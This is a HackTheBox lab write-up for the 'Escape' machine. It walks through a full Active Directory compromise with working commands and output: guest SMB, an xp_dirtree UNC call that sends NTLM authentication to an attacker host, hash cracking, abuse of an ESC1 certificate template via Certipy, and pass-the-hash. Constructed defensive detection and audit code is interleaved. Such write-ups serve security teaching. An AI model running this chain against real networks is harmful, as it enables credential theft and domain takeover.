Escape.
Medium | Windows | Active Directory
Tags: MSSQL, xp_dirtree, NTLM, ADCS, ESC1, HackTheBox
Medium Windows Active Directory machine on sequel.htb. Anonymous SMB access exposes a PDF containing SQL credentials. From MSSQL, xp_dirtree coerces an outbound NTLM authentication captured by Responder — cracking the hash gives WinRM access as sql_svc. The SQL error log contains a password typed into the username field, pivoting to Ryan.Cooper. An ADCS ESC1 misconfiguration allows requesting a certificate for Administrator, yielding the NT hash via Certipy and faketime for the +8h clock skew.
User Flag
b25d949f62xxxxxxxxxxxxxxxxxxxxxx
Root Flag
4523a45b65xxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance

Full port scan reveals a Domain Controller profile with an exposed MSSQL instance. Note the ~8h clock skew — this will matter during Kerberos authentication later.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.xx.xx
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec
389/tcp  open  ldap          Domain: sequel.htb
445/tcp  open  microsoft-ds  Windows Server 2019
1433/tcp open  ms-sql-s      SQL Server 2019 RTM
5985/tcp open  wsman         WinRM
|_clock-skew: mean: 7h59m58s
clock skew +8h: Kerberos rejects requests when the client clock is more than 5 minutes off the DC's. Certipy's auth step will fail without compensating for it; wrap each command in faketime -f "+8h".
/etc/hosts
$ echo "10.129.xx.xx sequel.htb dc.sequel.htb" | sudo tee -a /etc/hosts

Test SMB — null session is denied but the guest account works and reveals a non-default Public share:

SMB guest access
$ nxc smb 10.129.xx.xx -u guest -p '' --shares
Public    READ
IPC$      READ
$ smbclient //10.129.xx.xx/Public -U guest
smb: \> get "SQL Server Procedures.pdf"

The PDF is an internal onboarding document. A section at the bottom provides SQL Server access for users whose accounts haven't been created yet:

SQL Server Procedures.pdf
User: PublicUser
Password: GuestUserCantWrite1
credentials: PublicUser:GuestUserCantWrite1 for MSSQL. The document also mentions users Tom, Ryan, and Brandon — worth noting.
02 Foothold — xp_dirtree NTLM Coercion

Connect to MSSQL and assess privilege level. xp_cmdshell is locked, but xp_dirtree is available — it accepts UNC paths, forcing an outbound NTLM authentication we can capture with Responder.

MSSQL — check privs
$ impacket-mssqlclient sequel/PublicUser:GuestUserCantWrite1@10.129.xx.xx
SQL> SELECT IS_SRVROLEMEMBER('sysadmin');
0
SQL> EXEC xp_cmdshell 'whoami';
EXECUTE permission denied.
Responder + xp_dirtree coercion
# terminal 1 — start Responder
$ sudo responder -I tun0 -v
# terminal 2 — trigger outbound auth from MSSQL
SQL> EXEC master.dbo.xp_dirtree '\\10.10.14.78\share', 1, 1;
# Responder captures:
[SMB] NTLMv2 Username : sequel\sql_svc
[SMB] NTLMv2 Hash     : sql_svc::sequel:1a34688b7f2bac9b:DD3BD9CD...
finding: SQL Server runs as sequel\sql_svc. NTLMv2 hash captured.
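A defender's view of the same coercion, added here as an example (not part of the original writeup): the telemetry that exposes it is the SQL Server process itself opening an outbound SMB connection to a host it has no reason to reach. The Sysmon Event ID 3 (NetworkConnect) records, the allowlist of legitimate SMB destinations and the install path below are constructed.

```python
import json
from ipaddress import ip_address, ip_network

# Constructed allowlist: internal ranges the SQL host legitimately reaches over SMB (DCs, file servers).
ALLOWED_SMB_DESTINATIONS = [ip_network("10.129.0.0/16")]
SMB_PORTS = {445, 139}
SQL_IMAGES = {"sqlservr.exe"}

# Constructed Sysmon Event ID 3 records, JSON-encoded the way a log shipper would emit them.
# The second one is what an xp_dirtree UNC call to an attacker-controlled host looks like.
SQL_BINARY = "C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe"
SAMPLE_EVENTS = [
    json.dumps({"EventID": 3, "Image": SQL_BINARY, "User": "sequel\\sql_svc",
                "DestinationIp": "10.129.0.10", "DestinationPort": 445, "Initiated": True}),
    json.dumps({"EventID": 3, "Image": SQL_BINARY, "User": "sequel\\sql_svc",
                "DestinationIp": "10.10.14.78", "DestinationPort": 445, "Initiated": True}),
    json.dumps({"EventID": 3, "Image": "C:\\Windows\\System32\\svchost.exe", "User": "NT AUTHORITY\\SYSTEM",
                "DestinationIp": "10.10.14.78", "DestinationPort": 445, "Initiated": True}),
]


def is_coercion_candidate(event: dict) -> bool:
    """True when the SQL Server process opens an outbound SMB connection to a non-allowlisted host."""
    if event.get("EventID") != 3 or not event.get("Initiated"):
        return False
    if event["Image"].rsplit("\\", 1)[-1].lower() not in SQL_IMAGES:
        return False
    if int(event["DestinationPort"]) not in SMB_PORTS:
        return False
    dst = ip_address(event["DestinationIp"])
    return not any(dst in net for net in ALLOWED_SMB_DESTINATIONS)


def find_sql_smb_coercion(lines: list[str]) -> list[dict]:
    """Return one alert per suspicious connection; User is the account whose NTLM hash left the host."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if is_coercion_candidate(ev):
            alerts.append({"exposed_account": ev["User"], "destination": ev["DestinationIp"],
                           "port": int(ev["DestinationPort"])})
    return alerts
```

The alert fires only after the hash has already left the host, so it complements rather than replaces revoking EXECUTE on xp_dirtree from public and running SQL Server under an account that cannot log on remotely.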
hashcat — crack NTLMv2
$ hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt
sql_svc::sequel:...:REGGIE1234ronnie

sql_svc can use WinRM:

WinRM as sql_svc
$ nxc winrm 10.129.xx.xx -u sql_svc -p 'REGGIE1234ronnie'
[+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)
$ evil-winrm -i 10.129.xx.xx -u sql_svc -p 'REGGIE1234ronnie'
03 Lateral Movement — Password in SQL Error Log

From the sql_svc shell, browse the filesystem. C:\Users shows a Ryan.Cooper profile — inaccessible for now. But SQL Server error logs are readable and contain something unexpected:

SQL error log — password typed as username
*EWR* type C:\SQLServer\Logs\ERRORLOG.BAK
Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match...
Logon failed for user 'NuclearMosquito3'. Reason: Password did not match...
finding: someone typed their password (NuclearMosquito3) into the username field during SQL Server setup. The error log captured it in plaintext. Credentials: ryan.cooper:NuclearMosquito3.
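This kind of leak is easy to hunt for on the defending side. The following checker is an added example, not part of the original writeup: it scans ERRORLOG text for failed logons whose "user" value has no domain prefix and looks like a secret, masks the value so the alert does not re-leak it, and pairs it with the domain account that failed from the same client just before. The sample log and the allowlist of undomained SQL logins are constructed.

```python
import re

# Constructed sample in ERRORLOG format, modelled on the entries quoted above (not the box's file).
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:05.03 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:09.12 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
"""

# SQL logins that legitimately have no domain prefix (constructed; in practice read sys.server_principals).
KNOWN_LOGINS = {"sa", "publicuser"}

LOGON_FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def looks_like_password(value: str) -> bool:
    """Heuristic: no domain prefix, not a known SQL login, 8+ chars mixing letters and digits."""
    if "\\" in value or "@" in value or value.lower() in KNOWN_LOGINS:
        return False
    return len(value) >= 8 and any(c.isdigit() for c in value) and any(c.isalpha() for c in value)


def mask(value: str) -> str:
    """Keep only the first two characters so the alert itself does not re-leak the secret."""
    return value[:2] + "*" * (len(value) - 2)


def find_password_in_username(errorlog: str) -> list[dict]:
    """One record per suspected password-typed-as-username event.

    Each hit is paired with the last domain account that failed a logon from the
    same client address, since that is the account the value most likely belongs to.
    """
    last_domain_user: dict[str, str] = {}  # client address -> most recent domain account
    hits: list[dict] = []
    for line in errorlog.splitlines():
        m = LOGON_FAIL_RE.match(line)
        if not m:
            continue
        ts, user, client = m.group("ts"), m.group("user"), m.group("client")
        if "\\" in user:
            last_domain_user[client] = user
        elif looks_like_password(user):
            hits.append({"ts": ts, "client": client, "masked_value": mask(user),
                         "length": len(user), "likely_account": last_domain_user.get(client)})
    return hits
```

A hit should trigger a forced password change for the paired account and a purge of the affected ERRORLOG and ERRORLOG.n backups, which are readable by far more principals than the password itself ever should be.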
WinRM as Ryan.Cooper → user flag
$ evil-winrm -i 10.129.xx.xx -u ryan.cooper -p 'NuclearMosquito3'
*EWR* cat C:\Users\Ryan.Cooper\Desktop\user.txt
b25d949f62xxxxxxxxxxxxxxxxxxxxxx
user flag obtained.
04 Privilege Escalation — ADCS ESC1

While on sql_svc, whoami /groups showed membership in BUILTIN\Certificate Service DCOM Access — a hint that ADCS is installed and worth enumerating. Run Certipy as Ryan.Cooper to find vulnerable templates:

Certipy — find vulnerable templates
$ certipy-ad find -u ryan.cooper@sequel.htb -p 'NuclearMosquito3' \
    -dc-ip 10.129.xx.xx -vulnerable -stdout
Template Name              : UserAuthentication
Enrollee Supplies Subject  : True
Client Authentication      : True
Enrollment Rights          : SEQUEL.HTB\Domain Users
[!] ESC1 : Enrollee supplies subject, template allows client authentication.
ESC1: The template lets any Domain User specify an arbitrary Subject Alternative Name (SAN) while also allowing Client Authentication. This means any domain user can request a certificate that impersonates any account — including Administrator.
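The same conditions, written out as an audit check a defender can run over templates pulled from AD (an added example; not Certipy's code and not part of the original writeup). Besides the two properties Certipy printed above, ESC1 also needs the request to be issued without CA manager approval or an authorized signature, so the check covers those too. The template records are constructed dicts keyed by the real AD attribute names; the UserAuthentication record mirrors the Certipy output, with assumed values for the approval and signature attributes the output does not show.

```python
# Template attribute bits and EKU OIDs as stored in AD (real values, not page-specific).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CA manager approval
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose enrollment right effectively means "any domain user".
LOW_PRIV_PRINCIPALS = {"domain users", "authenticated users", "everyone"}


def check_esc1(template: dict) -> dict:
    """Evaluate one published template (attribute dict as read from LDAP) against the ESC1 conditions."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    enrollers = {p.split("\\")[-1].lower() for p in template.get("enrollmentRights", [])}
    conditions = {
        "enrollee_supplies_subject": bool(template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        # An empty EKU list means no EKU restriction, which also permits client authentication.
        "client_auth_eku": not ekus or bool(ekus & CLIENT_AUTH_EKUS),
        "no_manager_approval": not (template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": template.get("msPKI-RA-Signature", 0) == 0,
        "low_priv_can_enroll": bool(enrollers & LOW_PRIV_PRINCIPALS),
    }
    return {"name": template["name"], "esc1": all(conditions.values()), "conditions": conditions}


# Constructed records: the writeup's UserAuthentication template (approval/signature values assumed),
# and a built-in User template for contrast, where the CA builds the subject from AD itself.
USER_AUTHENTICATION = {
    "name": "UserAuthentication",
    "msPKI-Certificate-Name-Flag": 0x00000001,
    "msPKI-Enrollment-Flag": 0x00000000,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollmentRights": ["SEQUEL.HTB\\Domain Users"],
}
BUILTIN_USER = {
    "name": "User",
    "msPKI-Certificate-Name-Flag": 0xA6000000,  # subject built from AD; no ENROLLEE_SUPPLIES_SUBJECT bit
    "msPKI-Enrollment-Flag": 0x00000029,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
    "enrollmentRights": ["SEQUEL.HTB\\Domain Users"],
}
```

Any one failed condition breaks the chain, so the cheapest fixes are clearing ENROLLEE_SUPPLIES_SUBJECT on the template or requiring manager approval, followed by restricting enrollment rights to a vetted group.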

Request a certificate with the Administrator's UPN in the SAN:

Certipy — request cert for Administrator
$ certipy-ad req \
    -u ryan.cooper@sequel.htb -p 'NuclearMosquito3' \
    -ca sequel-DC-CA \
    -template UserAuthentication \
    -upn administrator@sequel.htb \
    -dc-ip 10.129.xx.xx
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Saved as 'administrator.pfx'

Authenticate with the certificate to get the NT hash. The +8h clock skew causes KRB_AP_ERR_SKEW — wrap the command in faketime:

Certipy auth (faketime +8h)
# without faketime — fails
$ certipy-ad auth -pfx administrator.pfx -domain sequel.htb -dc-ip 10.129.xx.xx
[-] KRB_AP_ERR_SKEW(Clock skew too great)
# with faketime — succeeds
$ faketime -f "+8h" certipy-ad auth -pfx administrator.pfx \
    -domain sequel.htb -username administrator -dc-ip 10.129.xx.xx
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
05 Root Flag
PTH → Administrator shell
$ evil-winrm -i 10.129.xx.xx -u administrator -H 'a52f78e4c751e5f5e17e1e9f3e58f4ee'
*EWR* cat C:\Users\Administrator\Desktop\root.txt
4523a45b65xxxxxxxxxxxxxxxxxxxxxx
attack chain:
SMB guest → Public share → PDF with PublicUser:GuestUserCantWrite1 → MSSQL → xp_dirtree coerces NTLM → Responder captures sql_svc NTLMv2 → hashcat (m5600) → sql_svc:REGGIE1234ronnie → WinRM → ERRORLOG.BAK password-as-username leak → ryan.cooper:NuclearMosquito3 → Certipy ESC1 on UserAuthentication template → cert for administrator@sequel.htb → faketime +8h → NT hash → PTH → root